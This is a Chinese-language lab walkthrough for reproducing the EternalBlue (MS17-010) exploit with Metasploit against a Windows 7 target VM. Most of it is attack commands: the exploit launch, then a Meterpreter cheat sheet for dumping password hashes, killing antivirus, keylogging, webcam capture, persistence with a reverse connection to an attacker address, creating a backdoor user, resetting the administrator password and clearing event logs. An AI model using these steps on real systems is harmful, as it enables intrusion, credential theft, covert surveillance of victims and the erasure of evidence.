永恒之蓝 ms17-010-eternalblue 漏洞复现

准备工作:

Kali(msf框架)

Win7靶机(关闭防火墙)

使用nmap进行ip端口扫描

启动msf框架并搜索所需漏洞

msfconsole
search blue

使用该漏洞&&设置所需参数&&运行

use 13
set rhosts 192.168.214.128
run

成功拿下该靶机

可使用的命令

sysinfo             #查看目标主机系统信息
run scraper         #查看目标主机详细信息
run hashdump        #导出密码的哈希
load kiwi           #加载
ps                  #查看目标主机进程信息
pwd                 #查看目标当前目录(windows)
getlwd              #查看目标当前目录(Linux)
search -f *.jsp -d e:\                #搜索E盘中所有以.jsp为后缀的文件
download  e:\test.txt  /root          #将目标机的e:\test.txt文件下载到/root目录下
upload    /root/test.txt d:\test      #将/root/test.txt上传到目标机的 d:\test\ 目录下getpid              #查看当前Meterpreter Shell的进程
PIDmigrate 1384     #将当前Meterpreter Shell的进程迁移到PID为1384的进程上
idletime            #查看主机运行时间
getuid              #查看获取的当前权限
getsystem           #提权
run  killav         #关闭杀毒软件
screenshot          #截图
webcam_list         #查看目标主机的摄像头
webcam_snap         #拍照
webcam_stream       #开视频
execute  参数  -f 可执行文件   #执行可执行程序
run getgui -u hack -p 123    #创建hack用户,密码为123
run getgui -e                #开启远程桌面
keyscan_start                #开启键盘记录功能
keyscan_dump                 #显示捕捉到的键盘记录信息
keyscan_stop                 #停止键盘记录功能
uictl  disable  keyboard     #禁止目标使用键盘
uictl  enable   keyboard     #允许目标使用键盘
uictl  disable  mouse        #禁止目标使用鼠标
uictl  enable   mouse        #允许目标使用鼠标
load                         #使用扩展库
run				             #使用扩展库
run persistence -X -i 5 -p 8888 -r 192.168.10.27        #反弹时间间隔是5s 会自动连接
                                   192.168.27的4444端口,缺点是容易被杀毒软件查杀
portfwd add -l 3389 -r 192.168.11.13 -p 3389     #将192.168.11.13的3389端口转发到本地的3389端口上,这里的192.168.11.13是获取权限的主机的ip地址
clearev                       #清除日志

关闭杀毒软件&&打开远程桌面连接

run killav      #关杀软
getuid          #当前用户
sysinfo         #系统信息
run getgui -e   #打开远程连接

查看用户&&进入shell&&修改密码

run hashdump                    #查看用户和hash
shell                           #进入CMD
chcp 65001                      #解决乱码
net user administrator 123456   #修改用户密码为123456

远程连接目标靶机

rdesktop 192.168.214.128

使用修改的密码登录即可


清除痕迹

clearev

参考链接:https://blog.csdn.net/qq_44159028/article/details/104044002

Q.E.D.